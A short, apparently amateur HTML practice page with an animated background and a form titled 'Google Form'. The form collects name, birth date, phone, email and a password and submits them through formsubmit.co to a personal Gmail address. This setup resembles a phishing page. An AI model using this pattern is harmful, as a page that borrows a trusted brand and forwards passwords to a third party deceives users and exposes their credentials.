<html>
    <style>
        form{
            width: 300px;
            margin: 80px auto;
            padding: 20px;
            background-color: lightgray;
            border: 5px solid black;
            border-radius: 10px;
            text-align: center;
        }
        body{
            background-image: linear-gradient(to bottom,gray,white);
            background-size: 100% 150px;
            background-position: 0% 100%;
            height: 50vh;
            animation:anime 10s infinite linear;
        }
        @keyframes
            anime{
                0%{
                    background-position:0% 100%;
                }
                100%{
                    background-position:100% 0%;
                }
            }
    </style>
    <head>
        <title>HTML WEB</title>
        <link rel="website icon" type="jpg"
        href="/home/md-saif/Downloads/html4321.png">
    </head>
    <body>
        <form action="https://formsubmit.co/scortal143@gmail.com" method="POST">
        <h1>Google Form</h1>
        Fristname : <input type="text" name="name" placeholder="Fristname"><br><br>
        Lastname : <input type="text" name="name" placeholder="Lastname(optional)"><br><br>
        Gender : <input type="radio" name="Gender" value="male">male &nbsp; &nbsp;
                 <input type="radio" name="Gender" value="female">female<br><br>
        <label for="Dob"></label>
        Dob : <input type="date" name="Dob" value="Dob"><br><br>
        Phone : <input type="number" name="phone no" placeholder="90******00"><br><br>
        email : <input type="email" name="email" placeholder="your mail"><br><br>
        password : <input type="password" name="pass" placeholder="* * * *"><br><br>
        <button type="submit" placeholder="SUBMIT"></button>
        </form>
    </body>
</html>